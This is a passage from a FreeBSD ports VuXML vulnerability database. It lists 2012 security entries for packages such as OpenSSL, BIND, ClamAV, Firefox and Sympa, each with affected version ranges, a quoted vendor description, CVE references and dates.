The existance of the swfupload library is sufficient to be vulnerable
to the reported problem.</p>
</blockquote>
</body>
</description>
<references>
<url>http://secunia.com/advisories/49780/</url>
<url>https://typo3.org/teams/security/security-bulletins/typo3-core/typo3-core-sa-2012-003/</url>
</references>
<dates>
<discovery>2012-07-04</discovery>
<entry>2012-07-06</entry>
</dates>
</vuln>
<vuln vid="fd8bac56-c444-11e1-864b-001cc0877741">
<topic>phpList -- SQL injection and XSS vulnerability</topic>
<affects>
<package>
<name>phplist</name>
<range><le>2.10.17</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Zero Science Lab reports:</p>
<blockquote cite="http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5081.php">
<p>Input passed via the parameter 'sortby' is not properly
sanitised before being returned to the user or used in SQL queries.
This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code. The param 'num' is vulnerable to a XSS issue
where the attacker can execute arbitrary HTML and script code in
a user's browser session in context of an affected site.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2740</cvename>
<cvename>CVE-2012-2741</cvename>
<bid>52657</bid>
<url>https://www.phplist.com/?lid=567</url>
<url>http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5081.php</url>
</references>
<dates>
<discovery>2012-03-21</discovery>
<entry>2012-07-02</entry>
</dates>
</vuln>
<vuln vid="aed44c4e-c067-11e1-b5e0-000c299b62e1">
<topic>FreeBSD -- Privilege escalation when returning from kernel</topic>
<affects>
<package>
<name>FreeBSD</name>
<range><ge>7.4</ge><lt>7.4_9</lt></range>
<range><ge>8.1</ge><lt>8.1_12</lt></range>
<range><ge>8.2</ge><lt>8.2_9</lt></range>
<range><ge>8.3</ge><lt>8.3_3</lt></range>
<range><ge>9.0</ge><lt>9.0_3</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Problem description:</p>
<blockquote cite="http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc">
<p>FreeBSD/amd64 runs on CPUs from different vendors. Due to varying
behaviour of CPUs in 64 bit mode a sanity check of the kernel may be
insufficient when returning from a system call.</p>
<p>Successful exploitation of the problem can lead to local kernel privilege
escalation, kernel data corruption and/or crash.
To exploit this vulnerability, an attacker must be able to run code with user
privileges on the target system.</p>
</blockquote>
</body>
</description>
<references>
<freebsdsa>SA-12:04.sysret</freebsdsa>
<cvename>CVE-2012-0217</cvename>
</references>
<dates>
<discovery>2012-06-12</discovery>
<entry>2012-06-27</entry>
</dates>
</vuln>
<vuln vid="fc5231b6-c066-11e1-b5e0-000c299b62e1">
<topic>FreeBSD -- Incorrect handling of zero-length RDATA fields in named(8)</topic>
<affects>
<package>
<name>FreeBSD</name>
<range><ge>7.4</ge><lt>7.4_9</lt></range>
<range><ge>8.1</ge><lt>8.1_11</lt></range>
<range><ge>8.2</ge><lt>8.2_9</lt></range>
<range><ge>8.3</ge><lt>8.3_3</lt></range>
<range><ge>9.0</ge><lt>9.0_3</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Problem description:</p>
<blockquote cite="http://security.freebsd.org/advisories/FreeBSD-SA-12:03.bind.asc">
<p>The named(8) server does not properly handle DNS resource records where
the RDATA field is zero length, which may cause various issues for the
servers handling them.</p>
<p>Resolving servers may crash or disclose some portion of memory to the
client. Authoritative servers may crash on restart after transferring a
zone containing records with zero-length RDATA fields. These would
result in a denial of service, or leak of sensitive information.</p>
</blockquote>
</body>
</description>
<references>
<freebsdsa>SA-12:03.bind</freebsdsa>
<cvename>CVE-2012-1667</cvename>
</references>
<dates>
<discovery>2012-06-12</discovery>
<entry>2012-06-27</entry>
</dates>
</vuln>
<vuln vid="185ff22e-c066-11e1-b5e0-000c299b62e1">
<topic>FreeBSD -- Incorrect crypt() hashing</topic>
<affects>
<package>
<name>FreeBSD</name>
<range><ge>7.4</ge><lt>7.4_8</lt></range>
<range><ge>8.1</ge><lt>8.1_10</lt></range>
<range><ge>8.2</ge><lt>8.2_8</lt></range>
<range><ge>8.3</ge><lt>8.3_2</lt></range>
<range><ge>9.0</ge><lt>9.0_2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Problem description:</p>
<blockquote cite="http://security.freebsd.org/advisories/FreeBSD-SA-12:02.crypt.asc">
<p>There is a programming error in the DES implementation used in crypt()
when handling input which contains characters that cannot be represented
with 7-bit ASCII.</p>
<p>When the input contains characters with only the most significant bit set
(0x80), that character and all characters after it will be ignored.</p>
</blockquote>
</body>
</description>
<references>
<freebsdsa>SA-12:02.crypt</freebsdsa>
<cvename>CVE-2012-2143</cvename>
</references>
<dates>
<discovery>2012-05-30</discovery>
<entry>2012-06-27</entry>
</dates>
</vuln>
<vuln vid="2ae114de-c064-11e1-b5e0-000c299b62e1">
<topic>FreeBSD -- OpenSSL multiple vulnerabilities</topic>
<affects>
<package>
<name>FreeBSD</name>
<range><ge>7.4</ge><lt>7.4_8</lt></range>
<range><ge>8.1</ge><lt>8.1_10</lt></range>
<range><ge>8.2</ge><lt>8.2_8</lt></range>
<range><ge>8.3</ge><lt>8.3_2</lt></range>
<range><ge>9.0</ge><lt>9.0_2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Problem description:</p>
<blockquote cite="http://security.freebsd.org/advisories/FreeBSD-SA-12:01.openssl.asc">
<p>OpenSSL fails to clear the bytes used as block cipher padding in SSL 3.0
records when operating as a client or a server that accept SSL 3.0
handshakes. As a result, in each record, up to 15 bytes of uninitialized
memory may be sent, encrypted, to the SSL peer. This could include
sensitive contents of previously freed memory. [CVE-2011-4576]</p>
<p>OpenSSL support for handshake restarts for server gated cryptography (SGC)
can be used in a denial-of-service attack. [CVE-2011-4619]</p>
<p>If an application uses OpenSSL's certificate policy checking when
verifying X509 certificates, by enabling the X509_V_FLAG_POLICY_CHECK
flag, a policy check failure can lead to a double-free. [CVE-2011-4109]</p>
<p>A weakness in the OpenSSL PKCS #7 code can be exploited using
Bleichenbacher's attack on PKCS #1 v1.5 RSA padding also known as the
million message attack (MMA). [CVE-2012-0884]</p>
<p>The asn1_d2i_read_bio() function, used by the d2i_*_bio and d2i_*_fp
functions, in OpenSSL contains multiple integer errors that can cause
memory corruption when parsing encoded ASN.1 data. This error can occur
on systems that parse untrusted ASN.1 data, such as X.509 certificates
or RSA public keys. [CVE-2012-2110]</p>
</blockquote>
</body>
</description>
<references>
<freebsdsa>SA-12:01.openssl</freebsdsa>
<cvename>CVE-2011-4576</cvename>
<cvename>CVE-2011-4619</cvename>
<cvename>CVE-2011-4109</cvename>
<cvename>CVE-2012-0884</cvename>
<cvename>CVE-2012-2110</cvename>
</references>
<dates>
<discovery>2012-05-03</discovery>
<entry>2012-06-27</entry>
</dates>
</vuln>
<vuln vid="f45c0049-be72-11e1-a284-0023ae8e59f0">
<topic>pycrypto -- vulnerable ElGamal key generation</topic>
<affects>
<package>
<name>py-pycrypto</name>
<range><ge>2.5</ge><lt>2.6</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Dwayne C. Litzenberger of PyCrypto reports:</p>
<blockquote cite="http://lists.dlitz.net/pipermail/pycrypto/2012q2/000587.html">
<p>In the ElGamal schemes (for both encryption and signatures), g is
supposed to be the generator of the entire Z^*_p group. However, in
PyCrypto 2.5 and earlier, g is more simply the generator of a random
sub-group of Z^*_p.</p>
<p>The result is that the signature space (when the key is used for
signing) or the public key space (when the key is used for encryption)
may be greatly reduced from its expected size of log(p) bits, possibly
down to 1 bit (the worst case if the order of g is 2).</p>
<p>While it has not been confirmed, it has also been suggested that an
attacker might be able to use this fact to determine the private key.</p>
<p>Anyone using ElGamal keys should generate new keys as soon as
practical.</p>
<p>Any additional information about this bug will be tracked at
https://bugs.launchpad.net/pycrypto/+bug/985164</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2417</cvename>
<url>http://lists.dlitz.net/pipermail/pycrypto/2012q2/000587.html</url>
<url>https://bugs.launchpad.net/pycrypto/+bug/985164</url>
</references>
<dates>
<discovery>2012-05-24</discovery>
<entry>2012-06-24</entry>
</dates>
</vuln>
<vuln vid="f46c4c6a-ba25-11e1-806a-001143cd36d8">
<topic>joomla -- Privilege Escalation</topic>
<affects>
<package>
<name>joomla</name>
<range><lt>2.5.5</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Joomla! reported a Core Privilege Escalation::</p>
<blockquote cite="http://developer.joomla.org/security/news/470-20120601-core-privilege-escalation.html">
<p>Inadequate checking leads to possible user privilege escalation..</p>
</blockquote>
</body>
</description>
<references>
<url>http://developer.joomla.org/security/news/470-20120601-core-privilege-escalation.html</url>
</references>
<dates>
<discovery>2012-04-29</discovery>
<entry>2012-06-19</entry>
</dates>
</vuln>
<vuln vid="eb12ebee-b7af-11e1-b5e0-000c299b62e1">
<topic>clamav -- multiple vulnerabilities</topic>
<affects>
<package>
<name>clamav</name>
<range><lt>0.97.5</lt></range>
</package>
<package>
<name>clamav-devel</name>
<range><lt>20120612</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>MITRE Advisories report:</p>
<blockquote cite="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1419">
<p>The TAR parser allows remote attackers to bypass malware detection
via a POSIX TAR file with an initial [aliases] character sequence.</p>
</blockquote>
<blockquote cite="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1457">
<p>The TAR parser allows remote attackers to bypass malware detection
via a TAR archive entry with a length field that exceeds the total
TAR file size.</p>
</blockquote>
<blockquote cite="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1458">
<p>The Microsoft CHM file parser allows remote attackers to bypass
malware detection via a crafted reset interval in the LZXC header
of a CHM file.</p>
</blockquote>
<blockquote cite="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1459">
<p>The TAR file parser allows remote attackers to bypass malware
detection via a TAR archive entry with a length field
corresponding to that entire entry, plus part of the header ofxi
the next entry.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1419</cvename>
<cvename>CVE-2012-1457</cvename>
<cvename>CVE-2012-1458</cvename>
<cvename>CVE-2012-1459</cvename>
</references>
<dates>
<discovery>2012-03-19</discovery>
<entry>2012-06-16</entry>
</dates>
</vuln>
<vuln vid="3c8d1e5b-b673-11e1-be25-14dae9ebcf89">
<topic>asterisk -- remote crash vulnerability</topic>
<affects>
<package>
<name>asterisk10</name>
<range><gt>10.*</gt><lt>10.5.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Asterisk project reports:</p>
<blockquote cite="https://www.asterisk.org/security">
<p>Skinny Channel Driver Remote Crash Vulnerability.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-3553</cvename>
<url>http://downloads.digium.com/pub/security/AST-2012-009.html</url>
<url>https://www.asterisk.org/security</url>
</references>
<dates>
<discovery>2012-06-14</discovery>
<entry>2012-06-14</entry>
</dates>
</vuln>
<vuln vid="5140dc69-b65e-11e1-9425-001b21614864">
<topic>ImageMagick -- multiple vulnerabilities</topic>
<affects>
<package>
<name>ImageMagick</name>
<range><lt>6.7.6.4</lt></range>
</package>
<package>
<name>ImageMagick-nox11</name>
<range><lt>6.7.6.4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>ImageMagick reports:</p>
<blockquote cite="http://www.cert.fi/en/reports/2012/vulnerability635606.html">
<p>Three vulnerabilities have been identified in ImageMagick's
handling of JPEG and TIFF files. With these vulnerabilities, it is
possible to cause a denial of service situation in the target
system.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0259</cvename>
<cvename>CVE-2012-0260</cvename>
<cvename>CVE-2012-1798</cvename>
<url>http://www.imagemagick.org/discourse-server/viewtopic.php?f=4&amp;t=20629</url>
<url>http://www.cert.fi/en/reports/2012/vulnerability635606.html</url>
</references>
<dates>
<discovery>2012-03-28</discovery>
<entry>2012-06-14</entry>
<modified>2014-04-30</modified>
</dates>
</vuln>
<vuln vid="55587adb-b49d-11e1-8df1-0004aca374af">
<topic>mantis -- multiple vulnerabilities</topic>
<affects>
<package>
<name>mantis</name>
<range><lt>1.2.11</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Mantis reports:</p>
<blockquote cite="http://www.openwall.com/lists/oss-security/2012/06/09/1">
<p>Roland Becker and Damien Regad (MantisBT developers) found that
any user able to report issues via the SOAP interface could also
modify any bugnotes (comments) created by other users. In a
default/typical MantisBT installation, SOAP API is enabled and any
user can sign up to report new issues. This vulnerability therefore
impacts upon many public facing MantisBT installations.</p>
<p>Roland Becker (MantisBT developer) found that the
delete_attachments_threshold permission was not being checked when
a user attempted to delete an attachment from an issue. The more
generic update_bug_threshold permission was being checked instead.
MantisBT administrators may have been under the false impression
that their configuration of the delete_attachments_threshold was
successfully preventing unwanted users from deleting
attachments.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2691</cvename>
<cvename>CVE-2012-2692</cvename>
<mlist>http://www.openwall.com/lists/oss-security/2012/06/09/1</mlist>
<mlist>http://sourceforge.net/mailarchive/forum.php?thread_name=1339229952.28538.22%40d.hx.id.au&amp;forum_name=mantisbt-dev</mlist>
</references>
<dates>
<discovery>2012-06-09</discovery>
<entry>2012-06-12</entry>
<modified>2012-06-13</modified>
</dates>
</vuln>
<vuln vid="38195f00-b215-11e1-8132-003067b2972c">
<topic>linux-flashplugin -- multiple vulnerabilities</topic>
<affects>
<package>
<name>linux-f10-flashplugin</name>
<range><lt>11.2r202.236</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Adobe reports:</p>
<blockquote cite="http://www.adobe.com/support/security/bulletins/apsb12-14.html">
<p>These vulnerabilities could cause a crash and potentially allow an attacker to take control of the affected system.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2034</cvename>
<cvename>CVE-2012-2035</cvename>
<cvename>CVE-2012-2036</cvename>
<cvename>CVE-2012-2037</cvename>
<cvename>CVE-2012-2038</cvename>
<cvename>CVE-2012-2039</cvename>
<cvename>CVE-2012-2040</cvename>
<url>http://www.adobe.com/support/security/bulletins/apsb12-14.html</url>
</references>
<dates>
<discovery>2012-06-08</discovery>
<entry>2012-06-09</entry>
</dates>
</vuln>
<vuln vid="bfecf7c1-af47-11e1-9580-4061862b8c22">
<topic>mozilla -- multiple vulnerabilities</topic>
<affects>
<package>
<name>firefox</name>
<range><gt>11.0,1</gt><lt>13.0,1</lt></range>
<range><lt>10.0.5,1</lt></range>
</package>
<package>
<name>linux-firefox</name>
<range><lt>10.0.5,1</lt></range>
</package>
<package>
<name>linux-seamonkey</name>
<range><lt>2.10</lt></range>
</package>
<package>
<name>linux-thunderbird</name>
<range><lt>10.0.5</lt></range>
</package>
<package>
<name>seamonkey</name>
<range><lt>2.10</lt></range>
</package>
<package>
<name>thunderbird</name>
<range><gt>11.0</gt><lt>13.0</lt></range>
<range><lt>10.0.5</lt></range>
</package>
<package>
<name>libxul</name>
<range><gt>1.9.2.*</gt><lt>10.0.5</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Mozilla Project reports:</p>
<blockquote cite="http://www.mozilla.org/security/known-vulnerabilities/">
<p>MFSA 2012-34 Miscellaneous memory safety hazards (rv:13.0/ rv:10.0.5)</p>
<p>MFSA 2012-36 Content Security Policy inline-script bypass</p>
<p>MFSA 2012-37 Information disclosure though Windows file shares and shortcut files</p>
<p>MFSA 2012-38 Use-after-free while replacing/inserting a node in a document</p>
<p>MFSA 2012-39 NSS parsing errors with zero length items</p>
<p>MFSA 2012-40 Buffer overflow and use-after-free issues found using Address Sanitizer</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-3101</cvename>
<cvename>CVE-2012-0441</cvename>
<cvename>CVE-2012-1938</cvename>
<cvename>CVE-2012-1939</cvename>
<cvename>CVE-2012-1937</cvename>
<cvename>CVE-2012-1940</cvename>
<cvename>CVE-2012-1941</cvename>
<cvename>CVE-2012-1944</cvename>
<cvename>CVE-2012-1945</cvename>
<cvename>CVE-2012-1946</cvename>
<cvename>CVE-2012-1947</cvename>
<url>http://www.mozilla.org/security/known-vulnerabilities/</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-34.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-36.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-37.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-38.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-39.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-40.html</url>
</references>
<dates>
<discovery>2012-06-05</discovery>
<entry>2012-06-05</entry>
</dates>
</vuln>
<vuln vid="1e14d46f-af1f-11e1-b242-00215af774f0">
<topic>quagga -- BGP OPEN denial of service vulnerability</topic>
<affects>
<package>
<name>quagga</name>
<range><le>0.99.20.1</le></range>
</package>
<package>
<name>quagga-re</name>
<range><lt>0.99.17.10</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>CERT reports:</p>
<blockquote cite="http://www.kb.cert.org/vuls/id/962587">
<p>If a pre-configured BGP peer sends a specially-crafted OPEN
message with a malformed ORF capability TLV, Quagga bgpd process
will erroneously try to consume extra bytes from the input packet
buffer. The process will detect a buffer overrun attempt before
it happens and immediately terminate with an error message. All
BGP sessions established by the attacked router will be closed
and its BGP routing disrupted.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1820</cvename>
<url>http://www.kb.cert.org/vuls/id/962587</url>
</references>
<dates>
<discovery>2012-06-04</discovery>
<entry>2012-06-05</entry>
</dates>
</vuln>
<vuln vid="de6d8290-aef7-11e1-898f-14dae938ec40">
<topic>mail/sympa* -- Multiple vulnerabilities in Sympa archive management</topic>
<affects>
<package>
<name>sympa</name>
<range><lt>6.0.7</lt></range>
<range><gt>6.1.*</gt><lt>6.1.11</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>David Verdin reports:</p>
<blockquote cite="http://www.sympa.org/security_advisories#security_breaches_in_archives_management">
<p>Multiple vulnerabilities have been discovered in Sympa archive
management that allow to skip the scenario-based authorization
mechanisms.</p>
<p>This vulnerability allows the attacker to:</p>
<ul>
<li>display the archives management page ('arc_manage')</li>
<li>download the list's archives</li>
<li>delete the list's archives</li>
</ul>
</blockquote>
</body>
</description>
<references>
<url>http://www.sympa.org/security_advisories#security_breaches_in_archives_management</url>
</references>
<dates>
<discovery>2012-05-15</discovery>
<entry>2012-06-05</entry>
</dates>
</vuln>
<vuln vid="1ecc0d3f-ae8e-11e1-965b-0024e88a8c98">
<topic>dns/bind9* -- zero-length RDATA can cause named to terminate, reveal memory</topic>
<affects>
<package>
<name>bind99</name>
<range><lt>9.9.1.1</lt></range>
</package>
<package>
<name>bind98</name>
<range><lt>9.8.3.1</lt></range>
</package>
<package>
<name>bind97</name>
<range><lt>9.7.6.1</lt></range>
</package>
<package>
<name>bind96</name>
<range><lt>9.6.3.1.ESV.R7.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>ISC reports:</p>
<blockquote cite="http://www.isc.org/software/bind/advisories/cve-2012-1667">
<p>Processing of DNS resource records where the rdata field is zero length
may cause various issues for the servers handling them.</p>
<p>Processing of these records may lead to unexpected outcomes. Recursive
servers may crash or disclose some portion of memory to the client.
Secondary servers may crash on restart after transferring a zone
containing these records. Master servers may corrupt zone data if the
zone option "auto-dnssec" is set to "maintain". Other unexpected
problems that are not listed here may also be encountered.</p>
<p>Impact: This issue primarily affects recursive nameservers.
Authoritative nameservers will only be impacted if an administrator
configures experimental record types with no data. If the server is
configured this way, then secondaries can crash on restart after
transferring that zone. Zone data on the master can become corrupted if
the zone with those records has named configured to manage the DNSSEC
key rotation.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1667</cvename>
<url>http://www.isc.org/software/bind/advisories/cve-2012-1667</url>
</references>
<dates>
<discovery>2012-06-04</discovery>
<entry>2012-06-04</entry>
<modified>2012-06-06</modified>
</dates>
</vuln>
<vuln vid="a8864f8f-aa9e-11e1-a284-0023ae8e59f0">
<topic>databases/postgresql*-server -- crypt vulnerabilities</topic>
<affects>
<package>
<name>postgresql-server</name>
<range><gt>8.3.*</gt><lt>8.3.18_1</lt></range>
<range><gt>8.4.*</gt><lt>8.4.11_1</lt></range>
<range><gt>9.0.*</gt><lt>9.0.7_2</lt></range>
<range><gt>9.1.*</gt><lt>9.1.3_1</lt></range>
<range><gt>9.2.*</gt><lt>9.2.b1_1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The PostgreSQL Global Development Group reports:</p>
<blockquote cite="http://www.postgresql.org/about/news/1397/">
<p>Today the PHP, OpenBSD and FreeBSD communities announced updates to
patch a security hole involving their crypt() hashing algorithms. This
issue is described in CVE-2012-2143. This vulnerability also affects a
minority of PostgreSQL users, and will be fixed in an update release on
June 4, 2012.</p>
<p>Affected users are those who use the crypt(text, text) function
with DES encryption in the optional pg_crypto module. Passwords
affected are those that contain characters that cannot be
represented with 7-bit ASCII. If a password contains a character
that has the most significant bit set (0x80), and DES encryption
is used, that character and all characters after it will be ignored.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2143</cvename>
<url>http://www.postgresql.org/about/news/1397/</url>
<url>http://git.postgresql.org/gitweb/?p=postgresql.git;a=patch;h=932ded2ed51e8333852e370c7a6dad75d9f236f9</url>
</references>
<dates>
<discovery>2012-05-30</discovery>
<entry>2012-05-30</entry>
<modified>2012-05-31</modified>
</dates>
</vuln>
<vuln vid="47f13540-c4cb-4971-8dc6-28d0dabfd9cd">
<topic>nut -- upsd can be remotely crashed</topic>
<affects>
<package>
<name>nut</name>
<range><ge>2.4.0</ge><le>2.6.3</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Networkupstools project reports:</p>
<blockquote cite="http://trac.networkupstools.org/projects/nut/changeset/3633">
<p>NUT server (upsd), from versions 2.4.0 to 2.6.3, are exposed to
crashes when receiving random data from the network.</p>
<p>This issue is related to the way NUT parses characters, especially
from the network. Non printable characters were missed from strings
operation (such as strlen), but still copied to the buffer, causing
an overflow.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2944</cvename>
<url>http://www.mail-archive.com/debian-bugs-dist@lists.debian.org/msg1027934.html</url>
<url>http://trac.networkupstools.org/projects/nut/changeset/3633</url>
</references>
<dates>
<discovery>2012-05-30</discovery>
<entry>2012-05-30</entry>
</dates>
</vuln>
<vuln vid="359f615d-a9e1-11e1-8a66-14dae9ebcf89">
<topic>asterisk -- multiple vulnerabilities</topic>
<affects>
<package>
<name>asterisk16</name>
<range><gt>1.6.*</gt><le>1.6.2.24</le></range>
</package>
<package>
<name>asterisk18</name>
<range><gt>1.8.*</gt><lt>1.8.12.1</lt></range>
</package>
<package>
<name>asterisk10</name>
<range><gt>10.*</gt><lt>10.4.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Asterisk project reports:</p>
<blockquote cite="https://www.asterisk.org/security">
<p>Remote crash vulnerability in IAX2 channel driver.</p>
<p>Skinny Channel Driver Remote Crash Vulnerability</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2947</cvename>
<url>http://downloads.digium.com/pub/security/AST-2012-007.html</url>
<cvename>CVE-2012-2948</cvename>
<url>http://downloads.digium.com/pub/security/AST-2012-008.html</url>
<url>https://www.asterisk.org/security</url>
</references>
<dates>
<discovery>2012-05-29</discovery>
<entry>2012-05-29</entry>
<modified>2012-05-29</modified>
</dates>
</vuln>
<vuln vid="617959ce-a5f6-11e1-a284-0023ae8e59f0">
<topic>haproxy -- buffer overflow</topic>
<affects>
<package>
<name>haproxy</name>
<range><lt>1.4.21</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>HAProxy reports:</p>
<blockquote cite="http://haproxy.1wt.eu/news.html">
<p>A flaw was reported in HAProxy where, due to a boundary error
when copying data into the trash buffer, an external attacker could
cause a buffer overflow. Exploiting this flaw could lead to the
execution of arbitrary code, however it requires non-default settings
for the global.tune.bufsize configuration option (must be set to a
value greater than the default), and also that header rewriting is
enabled (via, for example, the regrep or rsprep directives).
This flaw is reported against 1.4.20, prior versions may also be
affected.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2391</cvename>
<url>https://secunia.com/advisories/49261/</url>
<url>http://haproxy.1wt.eu/download/1.4/src/CHANGELOG</url>
<url>http://haproxy.1wt.eu/git?p=haproxy-1.4.git;a=commit;h=30297cb17147a8d339eb160226bcc08c91d9530b</url>
<url>http://haproxy.1wt.eu/news.html</url>
</references>
<dates>
<discovery>2012-05-21</discovery>
<entry>2012-05-24</entry>
<modified>2012-05-29</modified>
</dates>
</vuln>
<vuln vid="e0a969e4-a512-11e1-90b4-e0cb4e266481">
<topic>RT -- Multiple Vulnerabilities</topic>
<affects>
<package>
<name>rt40</name>
<range><ge>4.0</ge><lt>4.0.6</lt></range>
</package>
<package>
<name>rt38</name>
<range><lt>3.8.12</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>BestPractical report:</p>
<blockquote cite="http://blog.bestpractical.com/2012/05/security-vulnerabilities-in-rt.html">
<p>Internal audits of the RT codebase have uncovered a
number of security vulnerabilities in RT. We are releasing
versions 3.8.12 and 4.0.6 to resolve these vulnerabilities,
as well as patches which apply atop all released versions of
3.8 and 4.0.</p>
<p>The vulnerabilities addressed by 3.8.12, 4.0.6, and the
below patches include the following:</p>
<p>The previously released tool to upgrade weak password
hashes as part of CVE-2011-0009 was an incomplete fix and
failed to upgrade passwords of disabled users.</p>
<p>RT versions 3.0 and above contain a number of cross-site
scripting (XSS) vulnerabilities which allow an attacker to
run JavaScript with the user's credentials. CVE-2011-2083 is
assigned to this vulnerability.</p>
<p>RT versions 3.0 and above are vulnerable to multiple
information disclosure vulnerabilities. This includes the
ability for privileged users to expose users' previous
password hashes -- this vulnerability is particularly
dangerous given RT's weak hashing previous to the fix in
CVE-2011-0009. A separate vulnerability allows privileged
users to obtain correspondence history for any ticket in
RT. CVE-2011-2084 is assigned to this vulnerability.</p>
<p>All publicly released versions of RT are vulnerable to
cross-site request forgery (CSRF). CVE-2011-2085 is assigned
to this vulnerability.</p>
<p>We have also added a separate configuration option
($RestrictLoginReferrer) to prevent login CSRF, a different
class of CSRF attack.</p>
<p>RT versions 3.6.1 and above are vulnerable to a remote
execution of code vulnerability if the optional VERP
configuration options ($VERPPrefix and $VERPDomain) are
enabled. RT 3.8.0 and higher are vulnerable to a limited
remote execution of code which can be leveraged for
privilege escalation. RT 4.0.0 and above contain a
vulnerability in the global $DisallowExecuteCode option,
allowing sufficiently privileged users to still execute code
even if RT was configured to not allow it. CVE-2011-4458 is
assigned to this set of vulnerabilities.</p>
<p>RT versions 3.0 and above may, under some circumstances,
still respect rights that a user only has by way of a
currently-disabled group. CVE-2011-4459 is assigned to this
vulnerability.</p>
<p>RT versions 2.0 and above are vulnerable to a SQL
injection attack, which allow privileged users to obtain
arbitrary information from the database. CVE-2011-4460 is
assigned to this vulnerability.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-0009</cvename>
<cvename>CVE-2011-2082</cvename>
<cvename>CVE-2011-2083</cvename>
<cvename>CVE-2011-2084</cvename>
<cvename>CVE-2011-2085</cvename>
<cvename>CVE-2011-4458</cvename>
<cvename>CVE-2011-4459</cvename>
<cvename>CVE-2011-4460</cvename>
<url>http://blog.bestpractical.com/2012/05/security-vulnerabilities-in-rt.html</url>
</references>
<dates>
<discovery>2012-05-22</discovery>
<entry>2012-05-23</entry>
</dates>
</vuln>
<vuln vid="78c39232-a345-11e1-9d81-d0df9acfd7e5">
<topic>sympa -- Multiple Security Bypass Vulnerabilities</topic>
<affects>
<package>
<name>sympa</name>
<range><lt>6.1.11</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Secunia team reports:</p>
<blockquote cite="http://secunia.com/advisories/49045/">
<p>Multiple vulnerabilities have been reported in Sympa, which can be
exploited by malicious people to bypass certain security
restrictions.</p>
<p>The vulnerabilities are caused due to the application allowing
access to archive functions without checking credentials. This can
be exploited to create, download, and delete an archive.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-2352</cvename>
<url>http://secunia.com/advisories/49045/</url>
</references>
<dates>
<discovery>2012-05-14</discovery>
<entry>2012-05-21</entry>
</dates>
</vuln>
<vuln vid="495b46fd-a30f-11e1-82c9-d0df9acfd7e5">
<topic>foswiki -- Script Insertion Vulnerability via unchecked user registration fields</topic>
<affects>
<package>
<name>foswiki</name>
<range><lt>1.1.5</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Foswiki team reports:</p>
<blockquote cite="http://foswiki.org/Support/SecurityAlert-CVE-2012-1004">
<p>When a new user registers, the new user can add arbitrary HTML and
script code into the user topic which is generated by the
RegistrationAgent via standard registration fields such as
"FirstName" or "OrganisationName".</p>
<p>By design, Foswiki's normal editing features allow arbitrary HTML
markup, including script code, to be inserted into any topic anyway,
assuming the authenticated user has CHANGE permission - which is the
case on many Foswiki sites. However, the assumption that only
authenticated users with CHANGE permission may create script content
